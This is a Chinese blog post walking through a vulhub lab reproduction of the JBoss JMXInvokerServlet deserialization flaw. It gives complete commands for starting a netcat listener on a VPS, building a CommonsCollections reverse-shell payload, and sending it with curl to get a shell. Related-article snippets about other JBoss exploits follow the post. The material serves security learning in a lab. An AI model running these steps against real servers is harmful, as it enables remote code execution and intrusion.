【vulhub】JMXInvokerServlet-deserialization JBOOS 反序列化漏洞

最新推荐文章于 2022-09-09 14:15:32 发布
最新推荐文章于 2022-09-09 14:15:32 发布
阅读量2.3k 收藏
点赞数
分类专栏: JBoss 文章标签: 安全 java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121831821
版权

前言

影响版本
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

一、启动靶机

docker-compose build

docker-compose up -d

二、漏洞挖掘

访问如下URL时,出现下载文件

http://192.168.150.146:8080/invoker/JMXInvokerServlet

在这里插入图片描述

三、漏洞利用

1、下载利用工具:JavaDeserH2HC(http://scan.javasec.cn/java/JavaDeserH2HC.zip)
2、用VPS nc监听8888端口

nc -lvp 8888

3、把上面下载到的工具复制到 vps 里面,解压即可,进入解压目录,输入如下命令:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap VPS_IP:8888

(IP是VPS的ip,8888是下面要监听的端口,这里写哪个端口下面就要监听哪个端口)
在这里插入图片描述
4、因为我公网vps访问不到靶机,所以我把生成ReverseShellCommonsCollectionsHashMap.ser文件放到真实主机执行

curl http://192.168.150.146:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

上述命令的IP为靶机,即目标。
在这里插入图片描述

四、检验

在VPS上,nc收到反弹shell
在这里插入图片描述

参考:

https://blog.csdn.net/Aaron_Miller/article/details/106623088

Crazy_Yu8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization反序列化)代码执行漏洞
qq_51577576的博客
09-15 1102
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
java-sec-code 反序列化漏洞
weixin_44687621的博客
08-24 644
java反序列化 序列化的步骤为 创建一个ObjectOutputStream输出流 调用ObjectOutputStream.writeObject 反序列化的步骤为 创建一个ObjectInputStream输出流 调用ObjectInputStream.readObject 示例如下: package com; import java.io.Serializable; public class User implements Serializable { protected St
利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JiangBuLiu的博客
07-10 3053
JBoss JMXInvokerServlet 反序列化漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss反序...
Jboss JMXInvokerServlet-deserialization漏洞复现
最新发布
云舒的博客
09-09 436
Jboss JMXInvokerServlet-deserialization漏洞复现
Vulhub】JBOSS JMXInvokerServlet 反序列化漏洞复现
看不尽的尘埃——博客
02-07 2450
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131     过程 这个和前几个Jboss反序列化漏洞一样的利用方式。 只要把URL改成下面的即可: http://192.168.0.11:8080/invoker/JMXInvokerServlet            ...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
CVE-2020-9496 ofbiz反序列化漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、...
Java-Deserialization-Scanner:Burp Suite的多合一插件,用于检测和利用Java反序列化漏洞
05-13
Java反序列化扫描程序是一个Burp Suite插件,旨在检测和利用Java反序列化漏洞。 它由@ Mediaservice.net的安全顾问Federico Dotta编写。 该插件由三个不同的组件组成: 与Burp Suite主动和被动扫描仪集成 手动测试...
【jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞
serendipity1130的博客
08-31 962
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据: javac -cp .:common
Jboss反序列化漏洞
qq_44880255的博客
08-11 583
1、CVE-2017-12149 影响版本 Jboss5.x/6.x 漏洞原因 在JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下, 尝试将来自客户端的序列化数据流进行反序列化,导致任意代码执行。 引发漏洞的目录:http://your-ip:8080/invoker/readonly 漏洞复现 这里使用的环境是kali中的vulhub和docker。 进入vulhub/jboss/CVE-201
JMX-RMI反序列化中的小研究
xxsiyao的博客
07-14 611
简述 RMI 数据传输基于反序列化,如果服务中实现了 RMI 的调用且具有 Object 类型参数,那么就会造成反序列化(实际攻击中需要反序列化链) JMX 服务是基于 RMI 实现,且将凭证对象作为Object 参数传入,如果使用恶意构造的对象替代凭证传入,是否能攻击需要凭证认证的 JMX 服务了。 针对 JMX 的攻击 YSO 中有一个针对 JMX 的攻击模块,当 JMX 服务器存在反序列化链时,可以对JMX服务进行攻击 java -cp ysoserial.jar ysoserial.expl
Jboss反序列化漏洞的复现与原理
LJH1999ZN的博客
03-29 4974
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4436
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)
黑白的博客
12-21 2036
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
JBoss JMXInvokerServlet 反序列化漏洞
Kevin's Blog
06-08 2577
一、漏洞介绍 1.1 漏洞简介   经典的JBoss反序列化漏洞,JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象存在反序列化漏洞。 1.2 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1806
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
Lib之过?Java反序列化漏洞通用利用分析
weixin_34259159的博客
11-14 454
2019独角兽企业重金招聘Python工程师标准>>> ...
JBoos漏洞及利用整理
weixin_45106410的博客
11-30 4366
CVE-2013-4810 Apache Tomcat/Jboss远程代码执行漏洞 与CVE-2015-7501漏洞原理相同,这里详细介绍一下两者的区别,其区别就在于两个漏洞选择的进行其中JMXInvokerServlet和EJBInvokerServlet利用的是org.jboss.invocation.MarshalledValue进行的反序列化操作,而web-console/Invoker利用的org.jboss.console.remote.RemoteMBeanInvocation进行反序列化
Java反序列化漏洞利用:URLClassLoader执行链解析
有关Java反序列化漏洞的更多信息,可以查阅相关的安全研究文章,例如《java-deserialization-vulnerability-comments》。 总结,Java反序列化漏洞利用的关键在于找到合适的触发点,利用`URLClassLoader`来加载远程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值